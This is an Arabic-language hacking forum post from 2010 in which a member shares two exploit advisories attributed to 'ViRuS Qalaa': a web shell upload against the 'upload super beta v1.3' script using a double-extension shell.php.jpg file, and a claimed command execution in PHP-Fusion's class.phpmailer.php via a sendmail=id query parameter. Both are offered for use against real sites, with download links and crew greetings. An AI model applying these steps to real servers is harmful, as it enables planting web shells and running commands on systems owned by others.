اهلا وسهلا اعضاء العناكب اليوم احضرت لكم
ثغرتين جدد
اول ثغرة
كود PHP:
========================================================
upload super beta v1.3 Remote Shell Upload Vulnerability
========================================================
# Author: ViRuS Qalaa
# Email: em9@live.com
# Home Script: http://www.swalif.net/softs/swalif54/softs63908
# download Script: http://delmaa.com/upfile/users/fileupload.zip
# Version: 1.3
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# My Sites: www.pal-mafia.com & www.vbspiders.com
:::::::::::::::::::::::::
=================Exploit=================
DorK:In your Dreams
First Upload your shell.php.jpg on The Script upload super beta v1.3
----exploit----??
Then go to the following link to see the shell
http://{localhost}/{path}/store/shell.php.jpg
shell>>Name Shell
---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,VoLc4n0
and My friends Others and My friends in MSN
EnJoY o_O
المصدر
الثغرة الثانية
كود PHP:
# Exploit Title: PHP-Fusion Remote Command Execution Vulnerability
# Date: 2010/07/19
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
-=[ vuln c0de ]=-
popen($sendmail, 'w'))
/includes/class.phpmailer.php
Line:438
----exploit----
http://{localhost}/{path}/includes/class.phpmailer.php?sendmail=id
---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq
and My friends Others and My friends in MSN
EnJoY o_O
المصدر
تحياتي لكم والى لقاء
eyvjdk hghk k.gj gl,hru s;d,vjd
07-18-2010, 11:15 PM
ثغرتين الان نزلت لمواقع سكيورتي 
المواضيع المتشابهه 
العرض الشجري
